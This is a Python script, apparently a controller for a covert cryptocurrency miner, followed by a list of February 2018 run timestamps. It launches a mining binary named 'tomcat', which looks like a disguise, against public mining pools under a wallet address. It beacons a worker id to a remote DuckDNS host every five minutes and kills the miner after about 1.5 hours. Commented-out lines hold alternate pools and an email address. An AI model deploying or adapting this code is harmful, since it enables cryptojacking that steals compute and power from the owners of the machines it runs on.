import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:08.975019
#2018-02-17 17:09:01.350227
#2018-02-17 18:57:05.129134
#2018-02-17 20:46:01.697125
#2018-02-17 22:32:04.150781
#2018-02-18 00:14:07.793597
#2018-02-18 02:06:06.646757
#2018-02-18 03:54:07.361887
#2018-02-18 05:43:03.900180
#2018-02-18 07:36:04.113830
#2018-02-18 09:23:01.461239
#2018-02-18 11:08:04.898792
#2018-02-18 12:55:08.607472
#2018-02-18 14:41:06.115209
#2018-02-18 16:30:08.742658
#2018-02-18 18:19:06.542137
#2018-02-18 20:05:06.578332
#2018-02-18 21:51:06.902885
#2018-02-18 23:40:06.565829
#2018-02-19 01:26:06.197635
#2018-02-19 03:14:06.073193
#2018-02-19 04:59:03.788772
#2018-02-19 06:43:05.497075
#2018-02-19 08:33:05.974804
#2018-02-19 10:23:01.524294
#2018-02-19 12:11:04.393366
#2018-02-19 13:58:01.396169
#2018-02-19 15:47:01.396945
#2018-02-19 17:36:08.159001
#2018-02-19 19:23:05.328942
#2018-02-19 21:09:08.098665
#2018-02-19 22:55:07.531898
#2018-02-20 00:39:06.006973
#2018-02-20 02:29:05.279680
#2018-02-20 04:19:04.216197
#2018-02-20 06:03:04.134400
#2018-02-20 07:47:05.474637
#2018-02-20 09:32:04.650112
#2018-02-20 11:16:01.505152
#2018-02-20 13:03:01.516071
#2018-02-20 14:46:06.362674
#2018-02-20 16:35:08.694168
#2018-02-20 18:21:10.593590
#2018-02-20 20:11:08.672088
#2018-02-20 21:58:07.953754
#2018-02-20 23:40:09.813374
#2018-02-21 01:25:03.160274
#2018-02-21 03:15:04.916571
#2018-02-21 05:04:04.980689
#2018-02-21 06:52:05.451877
#2018-02-21 08:38:01.586206
#2018-02-21 10:23:06.407137
#2018-02-21 12:11:05.848287
#2018-02-21 13:59:02.028976
#2018-02-21 15:43:06.454518
#2018-02-21 17:34:08.517716
#2018-02-21 19:20:05.132010
#2018-02-21 21:08:05.123660
#2018-02-21 22:55:05.010235
#2018-02-22 00:35:10.286928
#2018-02-22 02:22:05.564330
#2018-02-22 04:09:01.703693
#2018-02-22 05:54:05.352907
#2018-02-22 07:40:06.799490
#2018-02-22 09:28:01.474986
#2018-02-22 11:14:06.623073
#2018-02-22 13:00:12.998143
#2018-02-22 14:49:04.419965
#2018-02-22 16:35:05.191918
#2018-02-22 18:20:08.481161
#2018-02-22 20:11:07.626445
#2018-02-22 21:57:03.979954
#2018-02-22 23:44:08.151563
#2018-02-23 01:33:07.329784
#2018-02-23 03:21:04.376405
#2018-02-23 05:08:05.585964
#2018-02-23 06:52:04.077067
#2018-02-23 08:41:07.972415
#2018-02-23 10:57:06.249976
#2018-02-23 12:52:05.976177
#2018-02-23 14:35:07.874600
#2018-02-23 16:24:01.917263
#2018-02-23 18:10:07.614412
#2018-02-23 19:55:02.440929
#2018-02-23 21:37:07.149811
#2018-02-23 23:25:05.736740
#2018-02-24 01:17:01.625786
#2018-02-24 03:08:07.886977
#2018-02-24 04:54:02.055291
#2018-02-24 06:39:03.956893
#2018-02-24 08:27:06.642580
#2018-02-24 10:14:01.587680
#2018-02-24 12:08:05.037887
#2018-02-24 13:55:01.794852
#2018-02-24 15:34:01.344919
#2018-02-24 17:32:01.256927
#2018-02-24 19:18:04.706781
#2018-02-24 21:07:03.695411
#2018-02-24 23:40:07.364057
#2018-02-25 03:35:06.064057
#2018-02-25 07:12:06.102791